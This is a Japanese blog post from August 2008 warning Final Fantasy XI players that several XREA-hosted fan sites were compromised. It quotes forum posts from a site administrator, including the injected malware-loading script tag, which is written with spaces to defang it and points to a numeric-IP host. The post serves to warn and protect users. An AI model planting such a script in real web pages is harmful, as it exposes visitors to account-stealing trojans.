- 2008.08.08 Friday
- セキュリティ関連
吟遊詩人スレテンプレサイト(http://bdbk.s41.xrea.com/)が、8月2日23:45頃〜7日22:00頃までマルウェアダウンロードスクリプトが仕込まれた状態だった模様です。
なお仕込まれていたのは6月のXREA広告フレーム改竄事件時に飛ばされていたサーバーのようですので、大変危険です。該当時間帯にアクセスした記憶がある方は早急にウィルスチェックとPS2もしくは感染の疑いのないPCからパスワード変更を。
現在は管理人様の方で対応されていますが、原因が不明のため再発の可能性があります。ご注意ください。
※8/9 2:30追記
FF11マップガイド(http://netbenri.s137.xrea.com/MAP/MAP.htm(上位はFF11便利ガイド http://www.netbenri.com/FF11.htm))にも、8/9 2:15現在、同じスクリプトが仕掛けられています。
Firefox3.0.1+NoScript1.7.8でアクセスは遮断できていますが、念のため踏まないようにご注意ください。なお、当サイトのサイドバーからのリンクは削除しました。
詩人テンプレサイトもマップガイドもXREAです。猫の中の人の見解ですが、XREAをターゲットにした改竄攻撃が大規模に行われている可能性を感じます。XREAのサーバーには独自ドメインを利用しているものも多いので、一見分からないものも多いです。ここ数日はネット閲覧時にはご注意ください。
※8/9 15:00さらに追記
黒魔協会・忍者スレテンプレもやられています。
ジョブ板のテンプレサイト他、FF関連のサイトでXREA上にあるものが集中的に狙われている感じがします……。
※8/11 14:30さらに追記
2008年8月XREAサイト改ざん(FF11WARNING)より。
上記4サイトについては管理者により対応がされた模様。
※8/11 20:00追記
FF11・マップガイド様移転確認
→ 【FF11・マップガイド 〜 orz< びっくりするほど よい旅を! 〜】
リンク先URLを修正の上はりなおしました。
※追記ここまで
以下詩人スレより転載。
なお仕込まれていたのは6月のXREA広告フレーム改竄事件時に飛ばされていたサーバーのようですので、大変危険です。該当時間帯にアクセスした記憶がある方は早急にウィルスチェックとPS2もしくは感染の疑いのないPCからパスワード変更を。
現在は管理人様の方で対応されていますが、原因が不明のため再発の可能性があります。ご注意ください。
※8/9 2:30追記
FF11マップガイド(http://netbenri.s137.xrea.com/MAP/MAP.htm(上位はFF11便利ガイド http://www.netbenri.com/FF11.htm))にも、8/9 2:15現在、同じスクリプトが仕掛けられています。
Firefox3.0.1+NoScript1.7.8でアクセスは遮断できていますが、念のため踏まないようにご注意ください。なお、当サイトのサイドバーからのリンクは削除しました。
詩人テンプレサイトもマップガイドもXREAです。猫の中の人の見解ですが、XREAをターゲットにした改竄攻撃が大規模に行われている可能性を感じます。XREAのサーバーには独自ドメインを利用しているものも多いので、一見分からないものも多いです。ここ数日はネット閲覧時にはご注意ください。
※8/9 15:00さらに追記
黒魔協会・忍者スレテンプレもやられています。
ジョブ板のテンプレサイト他、FF関連のサイトでXREA上にあるものが集中的に狙われている感じがします……。
※8/11 14:30さらに追記
2008年8月XREAサイト改ざん(FF11WARNING)より。
上記4サイトについては管理者により対応がされた模様。
※8/11 20:00追記
FF11・マップガイド様移転確認
→ 【FF11・マップガイド 〜 orz< びっくりするほど よい旅を! 〜】
リンク先URLを修正の上はりなおしました。
※追記ここまで
以下詩人スレより転載。
----
793 名前:名も無き軍師[sage] 投稿日:08/08/07(木) 22:04:32 ID:********
○詩人スレ住人の方へ 大切なご連絡です○
かなり久しぶりに書き込みます。>>1のテンプレサイト管理人です。
さきほど気付いたのですが、8月2日23時45分頃〜今まで、
テンプレサイト内のほぼ全ページに、
謎のスクリプトが、仕込まれてしまっていたようです。
仕込まれていたのは、下記のようなものです。
<script src= h t t p : // 1039045744 : 88 / jp.js ></script>
↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。
1039045744で検索すると、どうもアカウントハックを目的とするサイトのようだったので、
慌てて削除をしておきましたが、この期間中にアクセスされた方は、
もしかするとウィルスに感染しているかもしれません。
心当たりのある方は、一度ウィルスチェック等をしていただければと思います。
こんなことが起こるとは思いもよらず、どう対処すればいいのか混乱している状況ですが、
さしあたり、まずは報告をしておくべき、と考え、書き込みさせていただきました。
以上、よろしくお願いします。
794 名前:名も無き軍師[sage] 投稿日:08/08/08(金) 00:10:38 ID:********
>>793続報です。
○被害状況
テンプレサイトは、「左側メニュー」・「ヘッダ」・「フッタ」をどのページにも共通に読み込む作りになっているのですが、
この共通部品である、「左側メニュー」・「ヘッダ」の2つのファイルにスクリプトが埋め込まれてしまったため、
ほぼ全ページにスクリプトを仕込まれた状態になっていました。
なお、2つのファイルの更新時刻は、8月2日23時45分、8月2日23時49分でした。
○対応状況
どういう経緯でファイルが書き換えられてしまったのか不明なため、
さしあたりの対処として、下記3点を行いました。
・書き換えられていた2つのファイルの差し戻し
・FTPパスワードの変更
・TOPページに警告を掲載
とりあえずこれで様子をみたいと思いますが、
これ以外に何かするべき対策などあれば、お知らせいただけるとありがたいです。
よろしくお願いします。
795 名前:名も無き軍師[sage] 投稿日:08/08/08(金) 00:20:43 ID:*******
>>793
アカハクスレにレスへのリンク貼られてたので来てみました
指定ポートが異なりますが、h t t p : // 1039045744:XX〜というアドレスは
今年6月にXREAの広告改竄によるアカウントハックが蔓延した際、
接続されていたトロイ置き場と同一です。
おそらくは今回も同様の罠が仕掛けられていたものと想定されます。
また、XREAの無料スペースをご利用されているようですが、
↑でも書いた通り、今年6月にXREAの広告サーバーが乗っ取られ、
一定の確率で「Flashplayerのバージョンが古い場合、閲覧しただけで
アカウントハックトロイが自動的にDL・実行される」という罠が、
6/5〜6/17および6/26〜6/27の間、無料スペースで表示義務のある
広告に仕込まれていました。
つまり、上記期間中はXREAの無料スペースを使用していたサイトが
全てアカウントハック罠サイトへと変えられていたわけです。
この問題の発生が現在のアカウントハック多発のきっかけともなっており、
貴HPも上記改竄被害を受けたHPの条件に当てはまります。
併せて周知いただければと思います。
- Newer: 5年待ちの杖。
- Older: 2008年7月末現況